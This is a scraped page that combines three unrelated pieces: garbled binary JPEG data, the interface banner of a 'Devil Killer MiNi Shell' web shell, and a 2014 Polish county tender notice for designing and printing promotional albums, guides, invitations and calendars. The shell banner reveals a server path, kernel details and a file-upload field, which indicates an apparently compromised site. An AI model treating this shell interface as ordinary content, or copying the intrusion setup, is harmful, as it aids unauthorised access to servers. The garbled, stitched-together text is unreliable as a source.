JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140207/44088-N-2014.html

<p class="kh_header"><b>Czarnków: Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego</b><br>
<b>Numer ogłoszenia: 44088 - 2014; data zamieszczenia: 07.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Rybaki 3, 64-700 Czarnków, woj. wielkopolskie, tel. 067 2552225, faks 067 2530178.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnkowsko-trzcianecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonawca składa ofertę wraz z dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z niego, odrębnie dla każdej z części.

Część nr 1: 
Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego - Album fotograficzny

TERMIN REALIZACJI:  luty-maj 2014

Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich: Europa inwestująca w obszary wiejskie.
Zadanie współfinansowane ze środków Unii Europejskiej w ramach
osi 4 - LEADER Programu Rozwoju Obszarów Wiejskich na lata 2007-2013
Instytucja Zarządzająca PROW na lata 2007-2013 - Minister Rolnictwa i Rozwoju Wsi

I.Informacje ogólne dotyczące zamówienia:

Zadnie to, jest zaplanowane do realizacji w ramach projektu pt. Powiat czarnkowsko - trzcianecki w czterech porach roku - dokumentacja i promocja walorów kulturowych i przyrodniczych, - współfinansowanego ze środków Unii Europejskiej w ramach działania  413 Wdrażanie lokalnych strategii rozwoju, osi 4 - LEADER Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w zakresie małych projektów.
Umowa przyznania pomocy nr 01163-6930-UM1540224(12 z dnia 29.11.2012 r.

II.Szczegółowy zakres prac

1.Zakres prac związany  z wydaniem albumu obejmuje: projekt graficzny, skład, druk wraz z czynnościami introligatorskimi, pakowania w papier pakowy, oraz dostarczenie przedmiotu zamówienia na własny koszt i na własne ryzyko do siedziby Zamawiającego.
2.Szczegółowy opis przedmiotu zamówienia (parametry techniczne):
1)Projekt graficzny
2)Format: 27cmx22cm - układ poziomy, albumowy
3)Ilość stron 72 strony + okładka
4)Papier wnętrze: kreda mat. 170g
5)Kolor 4(4 + lakier dyspersyjny na całości (mat.)
6)Wyklejka przednia i tylna druk 4(0
7)Oklejka na okładce kreda matowa 150g+folia matowa, druk 4(0
8)Oprawa twarda
9)Wersja polska, angielska, niemiecka- ilość strona taka sama we wszystkich wersjach.
10)Nakład:
a)Wersja polska: 1000szt.
b)Wersja niemiecka: 500szt.
c)Wersja angielska: 500sz.
3.Informacje ogólne związane z projektem graficznym:
1)Teksty, zdjęcia, loga w wersji elektronicznej dostarczy Zamawiający do 7 dni kalendarzowych od dnia zawarcia umowy, z zastrzeżeniem możliwości wymiany tekstu lub zdjęć w związku z korektami projektu graficznego.
2)Wersje językowe albumu są identyczne (wymienia się wyłącznie tekst, niekoniecznie czarny)
3)Wszelkie prace nad projektem Wykonawca zobowiązuje się  na bieżąco konsultować z Zamawiającym
4)Wykonawca przedstawi Zamawiającemu 4 istotnie różniące się propozycje projektów szaty graficznej, do wyboru jednego, w celu dalszej obróbki graficznej.
5)Obróbka graficzna wybranego projektu będzie odbywała się na bieżąco, obejmując nielimitowaną liczbę korekt.
6)Przedstawienie Zamawiającemu 4 istotnie różniących się propozycji projektów szaty graficznej powinno nastąpić do 10 dni roboczych, od momentu przekazania materiałów niezbędnych do wykonania projektu.
7)Przekazanie projektów do wyboru może odbywać się osobiście lub drogą mailową.
4.Wykonawca przeprowadza korektę tekstu.
5.Przed przystąpieniem do druku Wykonawca przedstawi Zamawiającemu
1)wzór kolorystyczny do akceptacji (proof) o łącznej powierzchni 8 formatek A4 zawierający okładkę i fragmenty stron wnętrza wskazane przez Zamawiającego.
2)wydrukowaną makietę albumu do akceptacji merytorycznej. 
6.Wykonawca nadaje publikacji numer ISBN.
7.Wraz z wydrukowanymi albumami Wykonawca przekaże Zamawiającemu na nośniku cyfrowym pliki otwarte albumu nadające się do edycji. 
8.Przygotowanie wydawnictwa w celu dostawy do zamawiającego: 
1)Pakowanie w papier pakowy min. 100g lub folię
2)Czytelne opisanie każdej paczki według następującego wzoru: tytuł wydawnictwa, wersja językowa, ilość sztuk, rok wydruku

III.Realizacja zamówienia
1.Termin realizacji: luty-maj 2014
2.Dostawa przedmiotu zamówienia nastąpi najpóźniej do dnia 30 maja 2014r. 
3.Wykonawca oświadcza, że album będący przedmiotem zamówienia nie narusza praw autorskich, praw pokrewnych oraz jakichkolwiek innych praw osób trzecich
4.W ramach wynagrodzenia Wykonawca przenosi na Zamawiającego autorskie prawa majątkowe do albumu.
5.Przeniesienie majątkowych praw autorskich następuje z chwilą zapłaty wynagrodzenia określonego w bez ograniczeń co do terytorium, czasu, liczby egzemplarzy, w zakresie poniższych pól eksploatacji:
1)do nieograniczonego w czasie korzystania i rozporządzania, w kraju i za granicą, 
na wszystkich polach eksploatacji określonych w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz.U. 2006r. Nr 90, poz. 631 ze zm.), w szczególności na polach eksploatacji związanych z działalnością promocyjną, marketingową i reklamową, w tym prawa do:
a)wyłącznego używania i wykorzystania albumu,
b)wytwarzania, utrwalania i zwielokrotniania egzemplarzy albumu wszelkimi technikami, w tym techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową, w szczególności ich zwielokrotniania poprzez dokonywanie zapisu na płytach DVD lub innych nośnikach.
c)publicznego wykonywania, wystawiania i wyświetlania albumu na wszelkich imprezach otwartych i zamkniętych, w tym publicznego udostępniania albumu w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu i w czasie przez siebie wybranym,
d)emitowania albumu za pomocą wizji przewodowej, bezprzewodowej oraz za pośrednictwem satelity,
e)wydawania i rozpowszechniania albumu jako materiałów reklamowych,
f)wprowadzania albumu do pamięci komputera i umieszczania w sieci Internet, 
g)odtwarzania i reemitowania albumu
h)użyczania, najmu lub dzierżawy oryginału oraz innych egzemplarzy albumu.
6.Wykonawca ma prawo do umieszczania niniejszego albumu w swoim portfolio 
7.Jeżeli wykonawca wykona przedmiot umowy sprzeczny z umową, w sposób wadliwy (stwierdzona zostanie niska jakość druku, wady introligatorskie itp.), zaistnieją różnice między gotowym nakładem a materiałem po akceptacji  Zamawiający zastrzega sobie prawo do żądania usunięcia tych wad, wyznaczając  w tym celu Wykonawcy odpowiedni termin z zagrożeniem, że po bezskutecznym upływie wyznaczonego terminu może od umowy odstąpić i żądać zwrotu materiałów źródłowych.
8.Dodatkowy termin wyznaczony na usunięcie usterek przez Wykonawcę nie zwalnia go z nałożenia na Wykonawcę kar umownych związanych  z nieterminową realizacją zamówienia.

Część nr 2:
Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego -  Pakiet przewodników turystycznych w obwolucie.

TERMIN- maj- październik 2014 r.

I.Informacje ogólne dotyczące zamówienia:

Na realizację tego zadnia został złożony wniosek o pomoc w ramach projektu pt. Weekend w powiecie czarnkowsko-trzcianeckim - promocja potencjału turystycznego powiatu, - współfinansowanego ze środków Unii Europejskiej w ramach działania  413 Wdrażanie lokalnych strategii rozwoju, osi 4 - LEADER Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w zakresie małych projektów.
Wniosek znajduje się w trakcie weryfikacji przez Urząd Marszałkowski Województwa Wielkopolskiego w Poznaniu.

II.Szczegółowy zakres prac

Zakres prac związany  z wydaniem pakietu przewodników turystycznych w obwolucie obejmuje: projekt graficzny, skład, druk wraz z czynnościami introligatorskimi, pakowania w papier pakowy, oraz dostarczenie przedmiotu zamówienia na własny koszt i na własne ryzyko do siedziby Zamawiającego.
1.Szczegółowy opis przedmiotu zamówienia (parametry techniczne):
1)Obwoluta:
a)Projekt graficzny i przygotowanie do druku
b)Format po zamknięciu: wysokość 220mm, szerokość 115mm, grubość 20 mm (grubość dostosowana do łącznej szerokości zawartości -przewodników turystycznych)
c)Obwoluta składa się z dwóch części -okładki i wysuwanej szufladki, która nie wysuwa się całkowicie, tylko blokuje się w jednym miejscu.
(przykład obwoluty w siedzibie Zamawiającego, dołączone zdjęcia - załącznik nr 6)
d)Kreda matowa 300g
e)Druk 4(4 CMYK
f)Folia matowa zewnętrznie
g)Sztancowanie, wykrojnik
h)Składanie i sklejanie pudelka
2)Komplet przewodników
a)Projekt i przygotowanie do druku
b)Ilość: 6 książeczek w komplecie
c)Format 110x215 mm (pion)
d)Objętość: 12 stron wnętrza + 6 stron okładki (okładka ze skrzydełkiem z tyłu zawijanym do środka)
e)Papier kreda matowa 170g na całość
f)Druk 4(4 CMYK
g)Szycie zeszytowe
3)Kompletowanie przewodników do obwoluty
4)Nakład 2000szt. kompletów
2.Wykonawca przekaże pliki przewodnika w wersji elektronicznej w celu zamieszczenia plików na stronie internetowej Zamawiającego w następujący sposób: pliki powinny być zapisane, na nośniku cyfrowym w formatach: pdf (łącznie 6 plików książeczek + 1 plik obwoluty) oraz jpg przy rozdzielczości min. 200dpi, taki sposób, że strony obwoluty i strony każdej z książeczki zapisane są w osobnych, tematycznych  folderach w celu ich łatwej identyfikacji.
3.Informacje ogólne związane z projektem graficznym:
1)Teksty, zdjęcia, loga w wersji elektronicznej dostarczy Zamawiający do 7 dni kalendarzowych od dnia zawarcia umowy, z zastrzeżeniem możliwości wymiany tekstu lub zdjęć w związku z korektami projektu graficznego.
2)Projekt obwoluty oraz wszystkich książeczek powinien być spójny, przygotowany wg jednej linii graficznej.
3)Wszelkie prace nad projektem Wykonawca zobowiązuje się  na bieżąco konsultować z Zamawiającym.
4)Wykonawca przedstawi Zamawiającemu 4 istotnie różniące się propozycje projektów szaty graficznej, do wyboru jednego w celu dalszej obróbki graficznej.
5)Obróbka graficzna wybranego projektu będzie odbywała się na bieżąco, obejmując nielimitowaną liczbę korekt.
6)Przedstawienie Zamawiającemu 4 istotnie różniących się propozycji projektów  szaty graficznej powinno nastąpić do 10 dni roboczych od momentu przekazania materiałów niezbędnych do wykonania projektu.
7)Przekazanie projektów do wyboru może odbywać się osobiście lub drogą mailową.
4.Po akceptacji projektu Wykonawca przedstawi Zamawiającemu makietę technologiczną całego pakietu.
5.Wykonawca przeprowadza korektę tekstu.
6.Przed przystąpieniem do druku Wykonawca przedstawi Zamawiającemu do akceptacji:
1)wzór kolorystyczny (proof) o łącznej powierzchni 8 formatek A4 zawierający fragmenty stron wnętrza i okładek wskazane przez Zamawiającego.
2)wydrukowaną makietę do akceptacji merytorycznej całego przewodnika
7.Wykonawca nadaje publikacji numer ISBN.
8.Wraz z wydrukowanymi przewodnikami Wykonawca przekaże Zamawiającemu 
na nośniku cyfrowym pliki otwarte przewodnika nadające się do edycji.
9.Przygotowanie wydawnictwa w celu dostawy do zamawiającego: 
1)Pakowanie w papier pakowy min. 100g lub folię skompletowane przewodniki w obwolucie tj.: w jednej obwolucie powinno znajdować się 6 pozycji o odmiennych tytułach.
2)Czytelne opisanie każdej paczki według następującego wzoru: tytuł wydawnictwa, ilość sztuk, rok wydruku.

III.Realizacja zamówienia
1.Termin realizacji: maj - październik 2014
2.Dostawa przedmiotu umowy nastąpi najpóźniej do 17.10.2014 
3.Wykonawca oświadcza, że przedmiot zamówienia nie narusza praw autorskich, praw pokrewnych oraz jakichkolwiek innych praw osób trzecich
4.W ramach wynagrodzenia Wykonawca przenosi na Zamawiającego autorskie prawa majątkowe do przedmiotu zamówienia.
5.Przeniesienie majątkowych praw autorskich następuje z chwilą zapłaty wynagrodzenia określonego §4 ust. 1 umowy w bez ograniczeń co do terytorium, czasu, liczby egzemplarzy, w zakresie poniższych pól eksploatacji:
1)do nieograniczonego w czasie korzystania i rozporządzania, w kraju i za granicą, na wszystkich polach eksploatacji określonych w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz.U. 2006r. Nr 90, poz. 631 ze zm.), w szczególności na polach eksploatacji związanych z działalnością promocyjną, marketingową i reklamową, w tym prawa do:
a)wyłącznego używania i wykorzystania przedmiotu zamówienia,
b)wytwarzania, utrwalania i zwielokrotniania egzemplarzy przedmiotu zamówienia, wszelkimi technikami, w tym techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową, w szczególności ich zwielokrotniania poprzez dokonywanie zapisu na płytach DVD lub innych nośnikach.
c)publicznego wykonywania, wystawiania i wyświetlania przedmiotu zamówienia na wszelkich imprezach otwartych i zamkniętych, w tym publicznego udostępniania przedmiotu zamówienia w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu i w czasie przez siebie wybranym,
d)emitowania przedmiotu zamówienia za pomocą wizji przewodowej, bezprzewodowej oraz za pośrednictwem satelity,
e)wydawania i rozpowszechniania przedmiotu zamówienia jako materiałów reklamowych,
f)wprowadzania przedmiotu zamówienia do pamięci komputera i umieszczania w sieci Internet, 
g)odtwarzania i reemitowania przedmiotu zamówienia,
h)użyczania, najmu lub dzierżawy oryginału oraz innych egzemplarzy przedmiotu zamówienia.
6.Wykonawca ma prawo do umieszczania niniejszego przedmiotu zamówienia w swoim portfolio 
7.Jeżeli wykonawca wykona przedmiot umowy sprzeczny z umową, w sposób wadliwy (stwierdzona zostanie niska jakość druku, wady introligatorskie itp.), zaistnieją różnice między gotowym nakładem a materiałem po akceptacji  Zamawiający zastrzega sobie prawo do żądania usunięcia tych wad, wyznaczając  w tym celu Wykonawcy odpowiedni termin z zagrożeniem, że po bezskutecznym upływie wyznaczonego terminu może od umowy odstąpić i żądać zwrotu materiałów źródłowych.
8.Dodatkowy termin wyznaczony na usunięcie usterek przez Wykonawcę nie zwalnia go z nałożenia na Wykonawcę kar umownych związanych  z nieterminową realizacją zamówienia.

Część nr 3:
Opracowanie graficzne i druk materiałów promocyjno-informacyjnych dla powiatu czarnkowsko-trzcianeckiego: pozostały pakiet materiałów promocyjno-informacyjnych: zaproszenia (4 wzory), plakat, kalendarz ścienny na 2015 r. i kalendarz podkładowy na 2015r. 

TERMIN: luty - grudzień 2014, 

I.Informacje ogólne dotyczące zamówienia:

Zadnie to, jest zaplanowane do realizacji w ramach zadań Wydziału Promocji Ochrony, Ochrony Zdrowia i Spraw Społecznych Starostwa Powiatowego w Czarnkowie. Na zakres prac zamówienia składają się: projekt graficzny, skład i druk wraz z czynnościami introligatorskimi następujących materiałów promocyjnych -informacyjnych :
zaproszenia - maksymalnie 4 wzory, każdy po 250szt. nakładu
plakat- 1 wzór, nakład 250szt. 
kalendarza ściennego na 2015 (1 wzór), nakład 500
kalendarza podkładowego na 2015r. (1 wzór) , nakład 200 

II.Szczegółowy zakres prac

1.Zakres prac związany z wykonaniem zaproszeń, plakatu, kalendarza  z obejmuje: projekt graficzny, skład, druk wraz z czynnościami introligatorskimi, pakowania w papier pakowy, oraz dostarczenie przedmiotu zamówienia na własny koszt i na własne ryzyko do siedziby Zamawiającego.
2.Szczegółowy opis przedmiotu zamówienia (parametry techniczne):
1)Zaproszenia DL (99 mmx210mm) - 1 wzór
a)Projekt, skład i druk
b)Nakład 250szt. dla 1 wzoru.
c)Format przed złożeniem (220mmx210mm) 
d)Format po złożeniu DL(99 mmx210mm), bigowany wzdłuż dłuższej krawędzi 
e)Papier ozdobny,  metalizowany 300 gram, np. typ Galaxy Metallic, kolor: vanilla cream (30) z oferty firmy Europapier, lub równoważny. 
f)Druk: 1+1 
g)Bigowanie i złożenie zaproszenia do formatu DL
2)Zaproszenia A6
a)Projekt, skład i druk
b)Nakład po 250szt.dla min. 1 wzoru.
c)Format przed złożeniem A5 (210 mmx148 mm lub 296 mm x105 mm)
d)Format po złożeniu A6 (ok 148mm × 105mm),pion lub poziom
e)Papier kreda mat. 300gram 
f)Druk: 4+4 CMYK
g)Bigowanie i złożenie zaproszenia do formatu A6
3)Plakat
a)Projekt, skład i druk
b)Nakład: 300szt.
c)Druk 4+0 CMYK
d)Format A2
e)Papier kreda mat. 150g
4)Kalendarz ścienny trójdzielny na 2015r.
a)Projekt, skład i druk
b)Nakład: 500szt.
c)Sztywna główka kaszerowana z folia matową
d)Druk: 4+0 CMYK
e)Uszlachetnianie -folia matowa
f)Plecki kartonowe
g)Kalendaria: biały, ecru
5)Kalendarz podkładowy na 2015r.
a)Projekt, skład i druk
b)Nakład 200 szt.
c)Format A2 (420cmx590cm)
d)Papier offset 80 gram
e)Klejony od dołu, wzdłuż dłuższego boku
f)26 kartek w bloku
g)Druk 4+0 CMYK
h)Plecki kartonowe
3.W okresie trwania umowy Zamawiający przewiduje do wykonania przez Wykonawcę nie mniej niż 1 wzór i nie więcej niż 3 wzory zaproszeń A6.
4.Informacje ogólne związane z projektem graficznym dotyczące każdego z przedmiotu zamówienia:
1)Teksty, loga w wersji elektronicznej dostarczy Zamawiający w terminie na min. 20 dni roboczych przed terminem dostawy towaru do wykonawcy.
2)Projekt kalendarza podkładowego i ściennego powinien być spójny, z wprowadzoną zasadą konsekwencji
3)Projekt jednego wzoru zaproszenia A6 i plakatu na tą sama uroczystość powinien być spójny, z wprowadzoną zasadą konsekwencji
4)Wszelkie prace nad projektem Wykonawca zobowiązuje się  na bieżąco konsultować z Zamawiającym
5)Wykonawca przedstawi Zamawiającemu 4 istotnie różniące się propozycje projektów szaty graficznej przedmiotu zamówienia, do wyboru jednego w celu dalszej obróbki graficznej.
6)Obróbka graficzna wybranego projektu będzie odbywała się na bieżąco, obejmując nielimitowaną liczbę korekt.
7)Przedstawienie Zamawiającemu 4 istotnie różniących się propozycji projektów  szaty graficznej powinno nastąpić do 5 dni roboczych od momentu przekazania materiałów niezbędnych do wykonania projektu.
8)Przekazanie projektów do wyboru może odbywać się osobiście lub drogą mailową.
5.Wykonawca oświadcza, że przedmiot zamówienia nie narusza praw autorskich, praw pokrewnych oraz jakichkolwiek innych praw osób trzecich.
6.Wykonawca przeprowadza korektę tekstu.
7.Każdorazowo, przed przystąpieniem do ostatecznego druku Wykonawca zobowiązany jest przedstawić Zamawiającemu do akceptacji merytorycznej zamówiony przedmiot.
8.Przygotowanie przedmiotu zamówienia w celu dostawy do zamawiającego: 
-pakowanie przedmiotu zamówienia w papier pakowy min. 100g lub folię.
9.Realizacja zamówienia
1)Okres realizacji zamówienia obejmuje czas od dnia podpisania umowy do 
8 grudnia 2014r. 
2)Zamawiający zobowiązuje powiadomić Wykonawcę o rozpoczęciu prac związanych z danym przedmiotem zamówienia na min. 20 dni roboczych przed terminem  dostawy towaru do Wykonawcy.
3)Dostawa ostatniego z przedmiotu umowy nastąpi najpóźniej do 8 grudnia 2014r.
4)Orientacyjny harmonogram prac:
a)Zaproszenia DL- 1 wzór - okres realizacji  listopad - grudzień 2014r., przy czym dostawa towaru nie powinna odbyć się później niż do 8 grudnia 2014r.
b)Zaproszenie A6 (1 wzór) i plakat - okres realizacji czerwiec-  sierpień 2014 r. przy czym dostawa towaru nie powinna odbyć się później niż do 14 sierpnia 2014 r. 
c)Kalendarz ścienny trójdzielny na 2015r., i kalendarz podkładowy na 2015r. - okres realizacji październik-listopad 2014 przy czym dostawa towaru nie powinna odbyć się później niż do 28 listopada 2014 r. 
5)Jeżeli wykonawca wykona przedmiot umowy sprzeczny z umową, w sposób wadliwy (stwierdzona zostanie niska jakość druku, wady introligatorskie itp.), zaistnieją różnice między gotowym nakładem a materiałem po akceptacji  Zamawiający zastrzega sobie prawo do żądania usunięcia tych wad, wyznaczając  w tym celu Wykonawcy odpowiedni termin z zagrożeniem, że po bezskutecznym upływie wyznaczonego terminu może od umowy odstąpić i żądać zwrotu materiałów źródłowych.
6)Dodatkowy termin wyznaczony na usunięcie usterek przez Wykonawcę nie zwalnia go z nałożenia na Wykonawcę kar umownych związanych  z nieterminową realizacją zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia wymienionego powyżej warunku na podstawie dokumentów przedłożonych przez Wykonawców metodą: spełnia; nie spełnia. Ocena: zamawiający uzna spełnienie warunku określonego, gdy: oferent wykaże posiadanie uprawnień niezbędnych do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień. 
Dokumentem potwierdzającym spełnianie warunku będzie: 
-oświadczenie o posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; z wykorzystanie zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia wymienionego powyżej warunku na podstawie dokumentów przedłożonych przez Wykonawców metodą: spełnia; nie spełnia. Ocena: zamawiający uzna spełnienie warunku, gdy: oferent wykaże posiadanie odpowiedniej wiedzy i doświadczenia; Dokumentem potwierdzającym spełnianie warunku będzie: 
-oświadczenia o posiadaniu wiedzy i doświadczenia - z wykorzystaniem zał. nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia wymienionego powyżej warunku na podstawie dokumentów przedłożonych przez Wykonawców metodą: spełnia; nie spełnia. Ocena: zamawiający uzna spełnienie warunku, gdy: oferent wykaże dysponowanie potencjałem technicznym do wykonania zamówienia. 
Dokumentem potwierdzającym spełnianie warunku będzie:
-oświadczenie o dysponowaniu  odpowiednim potencjałem technicznym do wykonania zmówienia -z wykorzystaniem wzoru -zał.2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
